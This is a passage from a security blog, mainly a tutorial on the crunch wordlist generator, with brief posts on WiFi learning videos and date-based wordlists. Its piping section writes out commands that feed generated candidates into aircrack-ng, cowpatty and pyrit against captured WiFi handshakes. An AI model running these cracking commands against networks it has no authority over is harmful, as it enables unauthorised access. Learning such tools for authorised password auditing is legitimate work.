> Ctrl + C stopping the wordlist creation,<br />
> check the last couple of entries in the START temporary file ;<br />
<div style="color: lime;">
tail -n 2 START</div>
> copy or rename the temporary file to a name of your liking; <br />
<div style="color: lime;">
cp START file1.txt</div>
> restart the wordlist creation from the last noted entry in the temporary file;<br />
<div style="color: lime;">
./crunch 7 7 0123456789 -s 9670549 -o test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_cancel.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_cancel.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><span style="color: red;">NOTE!</span></b> crunch will overwrite START when it starts a new wordlist creation process, so be sure to rename START into whatever you want to ensure you don't lose the work already done !<br />
<br />
Of course using the starting block can be used for whatever reason, for instance if you are sure that you don't need any list with numbers starting before 59999999 ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -s 59999999 -o test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_norm.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_norm.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<b><u>CREATING CUSTOM PATTERNS</u></b></div>
<br />
This is where crunch really shines, and in my humble opinion, the most powerful capability that crunch has to offer.<br />
<br />
With a minimum amount of information on known or expected patterns and/or possible characters in the passphrase, custom patterns can be created allowing to specify what to place where in the created passhprases.<br />
In doing so the size of the wordlist can be reduced significantly and the wordlist can be tailored to the target in a much more efficient way, which is always to be endeavoured !<br />
<br />
To fix a pattern, we use the <b style="color: red;">-t</b> switch in crunch.<br />
<br />
There are fixed symbols used for certain character sets ; <br />
<span style="color: yellow;">@</span> --> Lower case alpha values (or @ will read and print from a specified character set, see further down in post)<br />
<span style="color: yellow;">,</span> --> Upper case alpha values <br />
<span style="color: yellow;">%</span> --> Numeric values<br />
<span style="color: yellow;">^</span> --> Special characters including 'space'<br />
<br />
So if we want to create a 6 character, lower alpha wordlist and with a pre-fix of 'dog';<br />
<div style="color: lime;">
./crunch 6 6 -t dog@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_01.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
or if we want 'dog' to be appended ;<br />
<div style="color: lime;">
./crunch 6 6 -t @@@dog</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_02.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
or have 'dog' bang in the middle ;<br />
<div style="color: lime;">
./crunch 7 7 -t @@dog@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_03.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Or 'dog' followed by an upper case alpha, number and symbol;<br />
<div style="color: lime;">
./crunch 6 6 -t dog,%^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_04.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Miscellaneous patterns</u></b><br />
We can also combine the various fixed character sets, for instance, if we want to create an 8 character<br />
wordlist with alpha, numeric and special characters in fixed positions;<br />
<div style="color: lime;">
./crunch 8 8 -t ,,^^@@%%</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_05.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Using the fixed character sets you can quickly and easily make 'quick' wordlists for a single character set..<br />
<br />
Creating a wordlist with only lower case;<br />
<span style="color: lime;">./crunch 4 4 -t @@@@</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_06.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
only numeric;<br />
<span style="color: lime;">./crunch 4 4 -t %%%%</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_07.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
or only uppercase;<br />
<span style="color: lime;">./crunch 4 4 -t ,,,,</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_08.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
only special characters;<br />
<div style="color: lime;">
./crunch 4 4 -t ^^^^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_09.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_09.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And of course if certain positions and characters are known, it can all be mixed up ;<br />
<span style="color: lime;">./crunch 9 9 -t %%DOG^^@@</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_10.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We can also even go a step further and specify which range of characters should be used for each character type.<br />
<u>In the below example ;</u><br />
lower alpha values to only be ; <b style="color: yellow;">abcdef</b><br />
upper alpha values to only be ; <b style="color: yellow;">ABCDEF</b><br />
numeric values to only be ; <b style="color: yellow;">12345</b><br />
special characters to only be ; <b style="color: yellow;">@#$%</b><br />
<br />
We can then specify same by entering these values manually in the command line ;<br />
<div style="color: red;">
<i>Note that it is required to enter the custom values in the order ;</i></div>
lower alpha -- upper alpha -- numeric -- special characters<br />
<br />
<div style="color: lime;">
./crunch 8 8 abcdef ABCDEF 12345 @#$%- -t @@,,%%^^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If there is no specific character range to be used for the character set, then that position should be<br />
completed with a '+' placeholder sign which signifies the usage of the complete standard character set for that set positon. (lower alpha -- upper alpha -- numeric -- special characters)<br />
<br />
The below example is using <span style="color: yellow;">'abcdef' as lower alpha charset</span>, the <span style="color: yellow;">full upper case charset</span>, <span style="color: yellow;">'12345'as numeric charset</span> and the <span style="color: yellow;">full special character charset</span>.<br />
<div style="color: lime;">
./crunch 8 8 abcdef + 12345 + -t @@,,%%^^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms2.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Although in the above examples @ is used as fixed character set for lower case values, we can also use it to specify a manually chosen single set of all types of characters ;<br />
<div style="color: lime;">
./crunch 8 8 123abcDEF -t TEST@@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms3.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: lime;">
./crunch 10 10 123abc+-= -t @@@test@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms4.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Remember that certain characters on some occasion require escaping, if in doubt, better to just do it.<br />
<div style="color: lime;">
./crunch 10 10 123abcDEF\!\@\# -t TESTING@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms5.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms5.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If you want to include a space in the charset, then enclose the charset in quotes ;<br />
(space at end of charset below) <br />
<div style="color: lime;">
./crunch "123abcDEF " -t TEST@@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms6.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<u><b>Creating telephone lists</b></u><br />
You can also use the -t switch to easily make lists of telephone numbers, so if for instance the telephone number<br />
is usually noted as for instance; 0131-321654, then you could easily create a wordlist of telephone numbers following that same example ;<br />
<div style="color: lime;">
./crunch 11 11 -t 0131-%%%%%%</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Or if the layout is different, for instance including a space such as "(01201) 111111" this is achieved by putting quotes on the -t pattern as follows (this to ensure that the space is included);<br />
<div style="color: lime;">
./crunch 14 14 -t "(01201) %%%%%%"</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel2.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Endless variations are possible.<br />
<br />
The possiblities crunch offers to create patterns with such detail give you many options to really fine-tune what you want placed where in your passphrase wordlist and thus reduce the size of your final wordlist. <br />
<br />
<br />
<div style="color: yellow;">
<b><u>ESCAPING / FIXING SPECIAL CHARACTERS FOR USE IN PATTERNS</u></b></div>
<b></b>When you start manually defining what to place where with special characters, you will on some occasions need to to 'escape' characters to allow crunch to read them correctly.<br />
<br />
This is the case for for instance an exclamation mark <span style="color: red;">!</span> ; <br />
<div style="color: lime;">
./crunch 4 4 -t 12!@</div>
will result in an error.<br />
In order to make it work correctly you must 'escape' the exclamation mark ;<br />
<div style="color: lime;">
./crunch 4 4 -t 12\!@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_escape.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_escape.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As some special characters are used to define character sets, this can cause some limitations when trying to fix positions of certain special characters. Such as wanting to use <b>@</b> as a fixed character ;<br />
./crunch 4 4 -t 012@<br />
or<br />
./crunch 4 4 -t 012\@<br />
This will not fix the character '@' but use it to provide lower case alpha values.<br />
<br />
To remedy this to some extent, since crunch v3.0, the new <b style="color: red;">-l</b> switch can be used to fix the literal character instead of having it refer to a place holder for a specific character set. <br />
<br />
This would now be accomplished by doing ;<br />
<div style="color: lime;">
./crunch 6 6 -t b@d%%% -l @</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Other possibilities; <br />
<div style="color: lime;">
./crunch 8 8 -t P@SS%%%% -l @</div>
<div style="color: lime;">
</div>
<div style="color: lime;">
./crunch 8 8 -t P@\$\$,,,, -l @</div>
etc. etc.<br />
<br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha -t pass^^@@ -l ^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_2.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Also, more than 1 placeholder character can be fixed as a literal character; <br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha -t pass@,%^ -l %^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_3.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Of course this in itself also has limitations as you are not able to to check for all possible lower case alpha<br />
values or passthrough a user defined charset with a fixed setting of the @ character.<br />
The below 2 examples will obviously only return 1 result as all the instances of the @ character will be fixed<br />
as a literal character. <br />
<div style="color: lime;">
./crunch 8 8 -t p@ss@@@@ -l @</div>
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha-numeric -t p@ss@@@@ -l @</div>
This is an issue that is being looked into and possibly a following update of crunch will have an answer.<br />
<br />
Of course there are workarounds for some part; if for instance you wanted a password list to start with "p@ss"<br />
followed by 4 characters of all possible lower case values, you could create a list of 4 characters;<br />
<div style="color: lime;">
./crunch 4 4 -o test.txt</div>
<br />
And then use 'sed' or 'awk' to place the word 'p@ss' in front of each line ;<br />
Using sed ;<br />
<div style="color: lime;">
sed 's/^/p\@ss/' test.txt > file1.txt</div>
Using awk ;<br />
<div style="color: lime;">
awk '{print "p@ss" $0}' test.txt > file1.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_arnd.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_arnd.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So with a bit of imagination and a couple of oneliners with sed or awk, you should still<br />
be able to create more or less what you want. <br />
<br />
<u><i>edit 25-05-2011</i></u><br />
bofh28 has informed me of another workaround which can be used.<br />
<br />
You can override the standard characters per placeholder setting by entering a different type of<br />
charset in a different position and then using the placeholder character for that position. <br />
<br />
Normally the 3rd position is for numeric values, however if you specify lower case values, it will use these<br />
characters, however you then do need to use the place holder for that position, in this example %.<br />
<br />
Confused ? You won't be after this episode of .. ;) <br />
<br />
<span style="color: lime;">./crunch 8 8 + + abcdefghijklmnopqrstuvwxyz + -t p@ss%%%% -l @</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_wrkarnd2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_wrkarnd2.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<b><u>PIPING CRUNCH TH</u><u>ROUGH TO OTHER PROGRAMS</u></b></div>
<div style="color: yellow;">
<br /></div>
Crunch can be used to pipe passwords through to programs such as aircrack / pyrit / cowpatty etc.<br />
<br />
Considering that crunch is now advising the estimated size of wordlists to be created following the command given as well as the wordcount, to have a seamless integration with piping, it is recommended to use the <b><span style="color: red;">-u</span></b> option to supress that information on size, wordcount etc.; <br />
Without using the -u command, it is possible that unexpected errors occur with some programs.<br />
<br />
Using the <b><span style="color: red;">-u</span></b> option will result in the creating of the wordlist directly instead of giving the 3 second delay during which the estimated wordlist size and wordcount is shown ;<br />
<br />
In examples only testing for 8 character numeric passwords ;<br />
<u>aircrack</u><br />
./crunch 8 8 -t %%%%%%%% -u | aircrack-ng -e SSID -w - /pathto/capfile.cap<br />
<br />
<u>cowpatty</u> <br />
./crunch 8 8 -t %%%%%%%% -u | cowpatty -f - -r /pathto/capfile.cap -s SSID<br />
<br />
<u>pyrit</u><br />
./crunch 8 8 -t %%%%%%%% -u | pyrit -i - -r /pathto/capfile.cap -e ESSID attack_passthrough<br />
<br />
<br />
<div style="color: yellow;">
<u><b>COMPRESSING OUTPUT FILES</b></u></div>
<br />
Output files can be compressed with crunch using the <b><span style="color: red;">-z</span></b> switch.<br />
<br />
Supported formats are;<br />
> gzip<br />
> bzip<br />
> lzma<br />
<br />
Crunch will first create the wordlist and will then compress the wordlist.<br />
Upon the finalisation of the wordlist creation, you will see the 100% being reached<br />
and the 100% denomination will continue to be printed until the compression is complete.<br />
<br />
So if you see a continuous 'stream' of 100%, don't worry, the program is not hanging,<br />
the output file is simply being compressed. <br />
It had me guessing when I was testing a compression of a couple of gigabytes.. but I assure you it is the case.<br />
<br />
The best level of compression and thus the slowest is obtained with lzma.<br />
The quickest compression, with the lowest level of compression, is obtained with gzip.<br />
<br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst lalpha -o test.txt -z gzip</div>
To unzip the created file ;<br />
<span style="color: lime;">gunzip test.txt.gz </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_g_gz.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_g_gz.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst lalpha -o test.txt -z bzip2</div>
To decompress the created file ;<br />
<div style="color: lime;">
bunzip2 test.txt.bz2</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_bz.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_bz.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst lalpha -o test.txt -z lzma</div>
To decompress the created file ;<br />
<div style="color: lime;">
unlzma test.txt.lzma</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_lz.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_lz.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =<br />
<br />
<br />
<br />
If you managed to come this far, well done, you are a patient / dedicated person :) <br />
Hope it wasn't too boring to go through ;)<br />
<br />
<br />
bofh28 has once again done a fantastic job in reaching the 3.0 milestone and<br />
a little birdy tells me there is yet more to come :D<br />
If and when revisions come out, I will try to keep this post updated to reflect the changes / additions.<br />
<br />
<br />
<b>Keep up the great work bofh28 !!</b><br />
<b><br />
</b><br />
<b><br />
</b><br />
<span style="color: red;">To actually manipulate an already created/existing wordlistm check out ; </span><br />
<a href="http://www.adaywithtape.blogspot.com/2011/07/wordlist-manipulation-revisited.html"><b>http://www.adaywithtape.blogspot.com/2011/07/wordlist-manipulation-revisited.html</b></a> </div>
Unknownnoreply@blogger.com325tag:blogger.com,1999:blog-8356530514965708840.post-16461967971996621622011-05-04T16:26:00.001+02:002011-05-04T16:26:47.321+02:00Getting to grips with WiFi<b><u>WIRELESS ONE O ONE </u></b><br />
<br />
<br />
This is just really a shout-out to the fantastic work that Vivek is doing on his site;<br />
<br />
<a href="http://www.blogger.com/goog_65282300">http://www.securitytube.net/</a><br />
<a href="http://www.securitytube.net/"><br />
</a><br />
He is currently creating a megaprimer on the various uses of the wireless capabilities<br />
and I strongly suggest you take a look at his videos on the subject.<br />
<br />
It now stands at 18 videos (as from today 04-05-2011) and it is a very detailed<br />
look at how things work and what vulnerabilities are out there that you should be<br />
aware of.<br />
<br />
His videos are very clear and detailed and worth your time in checking them out.<br />
<br />
Go for it and learn a lot at ;<br />
<br />
<a href="http://www.securitytube.net/">http://www.securitytube.net/</a>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8356530514965708840.post-8638691069109145442011-03-03T21:55:00.034+01:002012-08-12T10:24:18.265+02:00Creating wordlists based on dates<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #6aa84f;">
<br /></div>
<b style="color: #6aa84f;">wordlists based on dates</b><br />
<span style="color: #6aa84f;">======================</span><br />
<br />
<br />
<span style="color: red;"><b>Update 5</b></span><br />
24-06-2012<br />
Have released datelist v0.7<br />
- Fixed bug with February being excluded from whole century years<br />
(was a bug in leapyear calculations) <b><i>-- Thanks to stepking2</i></b><br />
- Fixed bug with July being omitted from results <b><i>--</i></b><span style="background-color: white;"><b><i>Thanks to stepking2</i></b></span><br />
- Included options to prepend or append word/character direct from command line<br />
DOWNLOAD;<br />
<b><span style="color: blue;"><a href="http://www.mediafire.com/file/wj1ncopb4cruhai/datelist_v0-7">http://www.mediafire.com/file/wj1ncopb4cruhai/datelist_v0-7</a></span></b><br />
<br />
23-12-2011<br />
Have now released datelist v0.6<br />
- Not limited to any dates anymore (yay !)<br />
- Much faster<br />
- Included more error checks<br />
- Totally awesome ;)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="390" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-6.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div style="color: red;">
<b>Update 3 </b></div>
<div style="color: red;">
<b>02-04-2011 </b></div>
<b>==========<br style="color: #cccccc;" /> </b><br />
<div style="color: black;">
<span style="color: #cccccc;">So have completed the work on v0.4, vid & download location herebelow.</span></div>
<div style="color: #cccccc;">
Its still slow and limited to 1902 -- 2037 dates, but seems a bit better </div>
<div style="color: #cccccc;">
(to look at at least :) ) </div>
<div style="color: #cccccc;">
Until I get to grips with Python or Perl enabling me to massively increase the speed</div>
<div style="color: #eeeeee;">
<div style="color: #cccccc;">
it will probably stay as it is now.<br />
<u>edit 01-05-2010</u>; <br />
Gitsnik put his mind to it (probably whilst reading the paper on the john, things come easier to him ;) )<br />
and wrote a fantastic bit of perl that does it sooo much faster and without any date limitations, when I manage<br />
to replicate that will put it up as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v04.jpg" width="640" /></a></div>
<br /></div>
<span style="color: black;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/q4Oof8BVbmc" title="YouTube video player" width="480"></iframe></span><br />
<div style="color: black;">
<div style="color: red;">
<br />
<b><span style="color: #cccccc;">Or on bliptv ;</span> </b><br />
<b><a href="http://blip.tv/file/4969508">http://blip.tv/file/4969508</a></b><br />
<br /></div>
</div>
<b><br />
</b></div>
<div style="color: red;">
<b>Update 2</b></div>
<b style="color: red;">=======</b><br />
Am working on v0.4 to be able to do the same directly from command line, should be less<br />
